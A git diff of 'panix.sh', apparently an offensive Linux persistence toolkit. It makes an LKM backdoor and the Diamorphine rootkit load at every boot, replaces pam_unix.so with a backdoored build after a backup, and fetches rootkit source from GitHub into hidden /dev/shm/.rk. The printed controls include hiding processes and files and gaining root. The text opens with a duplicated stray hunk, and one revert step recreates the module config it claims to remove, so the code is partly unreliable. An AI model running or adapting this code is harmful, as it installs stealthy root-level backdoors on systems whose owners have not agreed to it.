- touch ${rk_path}/restore_${identifier}.ko
+ touch ${rk_path}/restore_${identifier}.ko
+
+ # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+ echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d..."
+
+ if [ -d "/etc/modules-load.d" ]; then
+ echo "${identifier}" > /etc/modules-load.d/${identifier}.conf
+ fi
+
+ if [ -d "/usr/lib/modules-load.d" ]; then
+ echo "${identifier}" > /usr/lib/modules-load.d/${identifier}.conf
+ fi
+
+ if [ -f "/etc/modules" ]; then
+ if ! grep -q "^${identifier}$" /etc/modules; then
+ echo "${identifier}" >> /etc/modules
+ fi
+ fi
echo "[+] Diamorphine rootkit has been installed."
- echo "[+] The secret is: ${secret}"
- echo "[+] The identifier is: ${identifier}"
-
- echo "[+] kill -31 pid: hide/unhide any process;"
- echo "[+] kill -63 pid: turns the module (in)visible;"
- echo "[+] kill -64 pid: become root;"
- echo "[+] Any file starting with ${secret} is hidden."
- echo "[+] Source: https://github.com/m0nad/Diamorphine"
+ echo "[+] The secret is: ${secret}"
+ echo "[+] The identifier is: ${identifier}"
+
+ echo "[+] kill -31 pid: hide/unhide any process;"
+ echo "[+] kill -63 pid: turns the module (in)visible;"
+ echo "[+] kill -64 pid: become root;"
+ echo "[+] Any file starting with ${secret} is hidden."
+ echo "[+] Source: https://github.com/m0nad/Diamorphine"
}
diff --git a/panix.sh b/panix.sh
index dd13d38..79c2d68 100644
--- a/panix.sh
+++ b/panix.sh
@@ -2408,10 +2408,10 @@ setup_lkm_backdoor() {
# Ensure proper escaping for C string
command="\"/bin/bash\",\"-c\",\"$command\",NULL"
lkm_destination="$lkm_path"
- mkdir -p $(dirname $lkm_destination)
+ mkdir -p $(dirname $lkm_destination)
fi
- mkdir -p ${lkm_compile_dir}
+ mkdir -p ${lkm_compile_dir}
cat <<-EOF > ${lkm_source}
#include <linux/module.h>
@@ -2454,12 +2454,12 @@ setup_lkm_backdoor() {
MODULE_DESCRIPTION("LKM Backdoor");
EOF
- # Check if the source file was created
- if [ ! -f "$lkm_source" ]; then
- echo "Failed to create the kernel module source code at $lkm_source"
- exit 1
- else
- echo "Kernel module source code created: $lkm_source"
+ # Check if the source file was created
+ if [ ! -f "$lkm_source" ]; then
+ echo "[-] Failed to create the kernel module source code at $lkm_source"
+ exit 1
+ else
+ echo "[+] Kernel module source code created: $lkm_source"
fi
# Create the Makefile
@@ -2474,11 +2474,11 @@ clean:
make -C /lib/modules/\$(shell uname -r)/build M=\$(PWD) clean
EOF
- if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
- echo "Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
+ if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
+ echo "[-] Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
exit 1
- else
- echo "Makefile created: ${lkm_compile_dir}/Makefile"
+ else
+ echo "[+] Makefile created: ${lkm_compile_dir}/Makefile"
fi
# Compile the kernel module using make
@@ -2486,7 +2486,7 @@ EOF
make
if [ $? -ne 0 ]; then
- echo "Compilation failed. Exiting."
+ echo "[-] Compilation failed. Exiting."
exit 1
fi
@@ -2494,19 +2494,36 @@ EOF
cp ${lkm_compile_dir}/${lkm_name}.ko ${lkm_destination}
if [ $? -ne 0 ]; then
- echo "Copying module failed. Exiting."
+ echo "[-] Copying module failed. Exiting."
exit 1
fi
- echo "Kernel module compiled successfully: ${lkm_destination}"
+ echo "[+] Kernel module compiled successfully: ${lkm_destination}"
sudo insmod ${lkm_destination}
if [[ $? -ne 0 ]]; then
- echo "Failed to load the kernel module. Check dmesg for errors."
+ echo "[-] Failed to load the kernel module. Check dmesg for errors."
exit 1
fi
- echo "Kernel module loaded successfully. Check dmesg for the output."
+ # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+ echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+ if [ -d "/etc/modules-load.d" ]; then
+ echo "${lkm_name}" > /etc/modules-load.d/${lkm_name}.conf
+ fi
+
+ if [ -d "/usr/lib/modules-load.d" ]; then
+ echo "${lkm_name}" > /usr/lib/modules-load.d/${lkm_name}.conf
+ fi
+
+ if [ -f "/etc/modules" ]; then
+ if ! grep -q "^${lkm_name}$" /etc/modules; then
+ echo "${lkm_name}" >> /etc/modules
+ fi
+ fi
+
+ echo "[+] Kernel module loaded successfully. Check dmesg for the output."
+ echo "[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
echo "[+] LKM backdoor established!"
}
@@ -2566,6 +2583,12 @@ revert_lkm() {
echo "[-] Temporary directory '${lkm_compile_dir}' not found."
fi
+ # Remove panix from /etc/modules, /etc/modules-load.d/panix.conf and /usr/lib/modules-load.d/panix.conf
+ echo "[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+ sed -i '/panix/d' /etc/modules
+ rm -f /etc/modules-load.d/panix.conf
+ rm -f /usr/lib/modules-load.d/panix.conf
+
# Update module dependencies
echo "[+] Updating module dependencies..."
depmod -a
@@ -2884,97 +2907,104 @@ setup_malicious_package() {
# Revert Module: revert_malicious_package.sh
revert_malicious_package() {
- usage_revert_malicious_package() {
- echo "Usage: ./panix.sh --revert malicious-package"
- echo "Reverts any changes made by the setup_malicious_package module."
- }
+ usage_revert_malicious_package() {
+ echo "Usage: ./panix.sh --revert malicious-package"
+ echo "Reverts any changes made by the setup_malicious_package module."
+ }
- echo "[+] Reverting malicious package..."
+ echo "[+] Reverting malicious package..."
- if ! check_root; then
- echo "Error: This function can only be run as root."
- return 1
- fi
+ if ! check_root; then
+ echo "Error: This function can only be run as root."
+ return 1
+ fi
- local mechanism=""
- local PACKAGE_NAME="panix"
+ local mechanism=""
+ local PACKAGE_NAME="panix"
- # Detect if RPM or DPKG was used
- if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
- mechanism="rpm"
- elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then
- mechanism="dpkg"
- else
- echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
- fi
+ # Detect if RPM or DPKG was used
+ if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
+ mechanism="rpm"
+ elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then
+ mechanism="dpkg"
+ else
+ echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
+ fi
- if [[ "$mechanism" == "rpm" ]]; then
- echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
- rpm -e --noscripts "${PACKAGE_NAME}"
- if [[ $? -eq 0 ]]; then
- echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
- else
- echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
- fi
+ if [[ "$mechanism" == "rpm" ]]; then
+ echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
+ rpm -e --noscripts "${PACKAGE_NAME}"
+ if [[ $? -eq 0 ]]; then
+ echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
+ else
+ echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
+ fi
- # Remove the RPM file from /var/lib/rpm
- if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
- echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
- rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
- echo "[+] RPM file removed."
- else
- echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
- fi
+ # Remove the RPM file from /var/lib/rpm
+ if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
+ echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
+ rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
+ echo "[+] RPM file removed."
+ else
+ echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
+ fi
- elif [[ "$mechanism" == "dpkg" ]]; then
- echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
- dpkg --purge "${PACKAGE_NAME}"
- if [[ $? -eq 0 ]]; then
- echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
- else
- echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
- fi
- fi
+ elif [[ "$mechanism" == "dpkg" ]]; then
+ echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
+ dpkg --purge "${PACKAGE_NAME}"
+ if [[ $? -eq 0 ]]; then
+ echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
+ else
+ echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
+ fi
+ fi
- # Remove the cron job added by the setup function
- echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
- # Create a temporary file to store the current crontab
- crontab -l > /tmp/current_cron$$ 2>/dev/null
- if [[ $? -ne 0 ]]; then
- echo "[-] No crontab for user $(whoami). No action needed."
- rm -f /tmp/current_cron$$
- else
- # Remove lines containing the malicious package commands
- grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
- # Install the new crontab
- crontab /tmp/new_cron$$
- echo "[+] Cron job removed."
- # Clean up temporary files
- rm -f /tmp/current_cron$$ /tmp/new_cron$$
- fi
+ # Remove the cron job added by the setup function
+ echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
+ # Create a temporary file to store the current crontab
+ crontab -l > /tmp/current_cron$$ 2>/dev/null
+ if [[ $? -ne 0 ]]; then
+ echo "[-] No crontab for user $(whoami). No action needed."
+ rm -f /tmp/current_cron$$
+ else
+ # Remove lines containing the malicious package commands
+ grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
+ # Install the new crontab
+ crontab /tmp/new_cron$$
+ echo "[+] Cron job removed."
+ # Clean up temporary files
+ rm -f /tmp/current_cron$$ /tmp/new_cron$$
+ fi
- # Clean up any remaining build directories (RPM)
- if [[ -d "~/rpmbuild" ]]; then
- echo "[+] Removing RPM build directory '~/rpmbuild'..."
- rm -rf ~/rpmbuild
- echo "[+] RPM build directory removed."
- fi
+ # Clean up any remaining build directories (RPM)
+ if [[ -d "~/rpmbuild" ]]; then
+ echo "[+] Removing RPM build directory '~/rpmbuild'..."
+ rm -rf ~/rpmbuild
+ echo "[+] RPM build directory removed."
+ fi
- # Clean up any remaining package directories (DPKG)
- if [[ -d "${PACKAGE_NAME}" ]]; then
- echo "[+] Removing package directory '${PACKAGE_NAME}'..."
- rm -rf "${PACKAGE_NAME}"
- echo "[+] Package directory removed."
- fi
+ # Clean up any remaining package directories (DPKG)
+ if [[ -d "${PACKAGE_NAME}" ]]; then
+ echo "[+] Removing package directory '${PACKAGE_NAME}'..."
+ rm -rf "${PACKAGE_NAME}"
+ echo "[+] Package directory removed."
+ fi
- # Remove any lingering files in /var/lib/dpkg/info (DPKG)
- if [[ -d "/var/lib/dpkg/info" ]]; then
- echo "[+] Cleaning up '/var/lib/dpkg/info'..."
- rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
- echo "[+] Cleanup completed."
- fi
+ # Remove any lingering files in /var/lib/dpkg/info (DPKG)
+ if [[ -d "/var/lib/dpkg/info" ]]; then
+ echo "[+] Cleaning up '/var/lib/dpkg/info'..."
+ rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
+ echo "[+] Cleanup completed."
+ fi
- return 0
+ # Remove any package files left in the home directory
+ if [[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]; then
+ echo "[+] Removing package files '~/${PACKAGE_NAME}.deb' and/or '~/${PACKAGE_NAME}.rpm'..."
+ rm -f ~/${PACKAGE_NAME}.deb ~/${PACKAGE_NAME}.rpm
+ echo "[+] Package files removed."
+ fi
+
+ return 0
}
# Module: setup_motd_backdoor.sh
@@ -3585,9 +3615,11 @@ setup_pam_persistence() {
local dest_dir=""
local possible_dirs=(
"/lib/security"
- "/usr/lib64/security"
- "/lib/x86_64-linux-gnu/security"
"/lib64/security"
+ "/lib/x86_64-linux-gnu/security"
+ "/usr/lib/security"
+ "/usr/lib64/security"
+ "/usr/lib/x86_64-linux-gnu/security"
)
for dir in "${possible_dirs[@]}"; do
@@ -3602,6 +3634,9 @@ setup_pam_persistence() {
exit 1
fi
+ echo "[+] Backing up original PAM library..."
+ mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"
+
echo "[+] Copying PAM library to $dest_dir..."
mv -f modules/pam_unix/.libs/pam_unix.so "$dest_dir"
@@ -3769,52 +3804,29 @@ revert_pam() {
return 1
fi
- # Function to restore the original pam_unix.so module
- restore_pam_module() {
- echo "[+] Restoring original PAM module..."
-
- # Detect the Linux distribution and package manager
- if [ -f /etc/os-release ]; then
- . /etc/os-release
- linux_distro=${ID_LIKE:-$ID}
- else
- linux_distro=$(uname -s | tr '[:upper:]' '[:lower:]')
- fi
-
- case "$linux_distro" in
- *ubuntu*|*debian*|*mint*|*kali*)
- echo "[+] Detected Debian-based distribution."
- echo "[+] Reinstalling 'libpam-modules' package..."
- apt-get update >/dev/null 2>&1
- apt-get install --reinstall -y libpam-modules >/dev/null 2>&1
- if [[ $? -eq 0 ]]; then
- echo "[+] 'libpam-modules' reinstalled successfully."
- else
- echo "[-] Failed to reinstall 'libpam-modules'."
- fi
- ;;
- *rhel*|*centos*|*fedora*)
- echo "[+] Detected RPM-based distribution."
- echo "[+] Reinstalling 'pam' package..."
- if command -v yum &>/dev/null; then
- yum reinstall -y pam >/dev/null 2>&1
- elif command -v dnf &>/dev/null; then
- dnf reinstall -y pam >/dev/null 2>&1
- else
- echo "[-] Neither 'yum' nor 'dnf' package manager found."
- return 1
- fi
+ remove_rogue_pam() {
+ echo "[+] Searching for rogue PAM module"
+ # Check for the presence of the malicious PAM module
+ pam_module_paths=(
+ "/lib/security/pam_unix.so"
+ "/usr/lib/security/pam_unix.so"
+ "/usr/lib64/security/pam_unix.so"
+ "/lib/x86_64-linux-gnu/security/pam_unix.so"
+ "/usr/lib/x86_64-linux-gnu/security/pam_unix.so"
+ "/lib64/security/pam_unix.so"
+ )
+
+ # Revert pam_unix.so with the pam_unix.so.bak backup
+ for pam_module in "${pam_module_paths[@]}"; do
+ if [[ -f "$pam_module.bak" ]]; then
+ mv -f "$pam_module.bak" "$pam_module"
if [[ $? -eq 0 ]]; then
- echo "[+] 'pam' reinstalled successfully."
+ echo "[+] Restored original PAM module '$pam_module'."
else
- echo "[-] Failed to reinstall 'pam'."
+ echo "[-] Failed to restore original PAM module '$pam_module'."
fi
- ;;
- *)
- echo "[-] Unsupported distribution: $linux_distro"
- return 1
- ;;
- esac
+ fi
+ done
}
# Function to remove malicious PAM_EXEC configurations and scripts
@@ -3895,32 +3907,8 @@ revert_pam() {
fi
}
- # Check for the presence of the malicious PAM module
- is_pam_module_replaced=false
- pam_module_paths=(
- "/lib/security/pam_unix.so"
- "/usr/lib64/security/pam_unix.so"
- "/lib/x86_64-linux-gnu/security/pam_unix.so"
- "/lib64/security/pam_unix.so"
- )
- for pam_module in "${pam_module_paths[@]}"; do
- if [[ -f "$pam_module" ]]; then
- # Check if the pam_unix.so has been modified
- if strings "$pam_module" | grep -q "PANIX"; then
- is_pam_module_replaced=true
- break
- fi
- fi
- done
-
- if [[ "$is_pam_module_replaced" = true ]]; then
- echo "[+] Malicious PAM module detected."
- restore_pam_module
- else
- echo "[-] No malicious PAM module detected."
- fi
-
# Remove PAM_EXEC backdoor and logging
+ remove_rogue_pam
remove_pam_exec_backdoor
remove_pam_exec_logging
@@ -4870,25 +4858,25 @@ revert_reverse_shell() {
# Module: setup_rootkit.sh
setup_rootkit() {
- # References:
- # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
- # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
- # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
+ # References:
+ # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
+ # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
+ # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
- local rk_path="/dev/shm/.rk"
+ local rk_path="/dev/shm/.rk"
local tmp_path="/tmp"
- local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
- local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
- local clone_url="https://github.com/Aegrah/Diamorphine.git"
- local secret=""
- local identifier=""
+ local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
+ local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
+ local clone_url="https://github.com/Aegrah/Diamorphine.git"
+ local secret=""
+ local identifier=""
if ! check_root; then
echo "Error: This function can only be run as root."
exit 1
fi
- usage_rootkit() {
+ usage_rootkit() {
echo "Usage: ./panix.sh --rootkit"
echo "--examples Display command examples"
echo "--secret <secret> Specify the secret"
@@ -4953,57 +4941,57 @@ setup_rootkit() {
exit 1
fi
- echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
- echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
- echo "[!] I cannot guarantee that it will work on other distributions."
- sleep 5
+ echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
+ echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
+ echo "[!] I cannot guarantee that it will work on other distributions."
+ sleep 5
- mkdir -p $rk_path
+ mkdir -p $rk_path
- # Check if wget or curl is installed
- if command -v wget >/dev/null 2>&1; then
- downloader="wget"
- elif command -v curl >/dev/null 2>&1; then
- downloader="curl"
- else
- echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
- exit 1
- fi
+ # Check if wget or curl is installed
+ if command -v wget >/dev/null 2>&1; then
+ downloader="wget"
+ elif command -v curl >/dev/null 2>&1; then
+ downloader="curl"
+ else
+ echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
+ exit 1
+ fi
- # Function to download files using the available downloader
- download_file() {
- local url="$1"
- local output="$2"
- if [ "$downloader" = "wget" ]; then
- wget -O "$output" "$url"
- else
- curl -L -o "$output" "$url"
- fi
- }
+ # Function to download files using the available downloader
+ download_file() {
+ local url="$1"
+ local output="$2"
+ if [ "$downloader" = "wget" ]; then
+ wget -O "$output" "$url"
+ else
+ curl -L -o "$output" "$url"
+ fi
+ }
- # Check for zip/unzip
- if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
- echo "zip/unzip is available. Downloading diamorphine.zip..."
- download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
- unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
+ # Check for zip/unzip
+ if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
+ echo "zip/unzip is available. Downloading diamorphine.zip..."
+ download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
+ unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
mv ${tmp_path}/diamorphine/Diamorphine-master/* "${rk_path}/"
- # Check for tar
- elif command -v tar >/dev/null 2>&1; then
- echo "tar is available. Downloading diamorphine.tar..."
- download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
- tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
+ # Check for tar
+ elif command -v tar >/dev/null 2>&1; then
+ echo "tar is available. Downloading diamorphine.tar..."
+ download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
+ tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
- # Check for git
- elif command -v git >/dev/null 2>&1; then
- echo "git is available. Cloning diamorphine.git..."
- git clone "${clone_url}" "${tmp_path}/diamorphine"
+ # Check for git
+ elif command -v git >/dev/null 2>&1; then
+ echo "git is available. Cloning diamorphine.git..."
+ git clone "${clone_url}" "${tmp_path}/diamorphine"
mv ${tmp_path}/diamorphine/* "${rk_path}/"
- # If none are available
- else
- echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
- exit 1
- fi
+ # If none are available
+ else
+ echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
+ exit 1
+ fi
# Obfuscate most obvious strings
# Files
@@ -5057,17 +5045,34 @@ setup_rootkit() {
fi
make -C ${rk_path} clean
- touch ${rk_path}/restore_${identifier}.ko
+ touch ${rk_path}/restore_${identifier}.ko
+
+ # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+ echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d..."
+
+ if [ -d "/etc/modules-load.d" ]; then
+ echo "${identifier}" > /etc/modules-load.d/${identifier}.conf
+ fi
+
+ if [ -d "/usr/lib/modules-load.d" ]; then
+ echo "${identifier}" > /usr/lib/modules-load.d/${identifier}.conf
+ fi
+
+ if [ -f "/etc/modules" ]; then
+ if ! grep -q "^${identifier}$" /etc/modules; then
+ echo "${identifier}" >> /etc/modules
+ fi
+ fi
echo "[+] Diamorphine rootkit has been installed."
- echo "[+] The secret is: ${secret}"
- echo "[+] The identifier is: ${identifier}"
-
- echo "[+] kill -31 pid: hide/unhide any process;"
- echo "[+] kill -63 pid: turns the module (in)visible;"
- echo "[+] kill -64 pid: become root;"
- echo "[+] Any file starting with ${secret} is hidden."
- echo "[+] Source: https://github.com/m0nad/Diamorphine"
+ echo "[+] The secret is: ${secret}"
+ echo "[+] The identifier is: ${identifier}"
+
+ echo "[+] kill -31 pid: hide/unhide any process;"
+ echo "[+] kill -63 pid: turns the module (in)visible;"
+ echo "[+] kill -64 pid: become root;"
+ echo "[+] Any file starting with ${secret} is hidden."
+ echo "[+] Source: https://github.com/m0nad/Diamorphine"
}
# Revert Module: revert_rootkit.sh
@@ -5173,6 +5178,24 @@ revert_rootkit() {
done
fi
+ # Remove the module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+ echo "[+] Removing rootkit module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+ if [ -d "/etc/modules-load.d" ]; then
+ echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf
+ fi
+
+ if [ -d "/usr/lib/modules-load.d" ]; then
+ echo "${rk_name}" > /usr/lib/modules-load.d/${rk_name}.conf
+ fi
+
+ if [ -f "/etc/modules" ]; then
+ if grep -q "^${rk_name}$" /etc/modules; then
+ sed -i "/^${rk_name}$/d" /etc/modules
+ fi
+ fi
+
+ echo "[+] Rootkit module removed from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
+
# Step 4: Remove /dev/shm/.rk directory
remove_directory "$rk_path"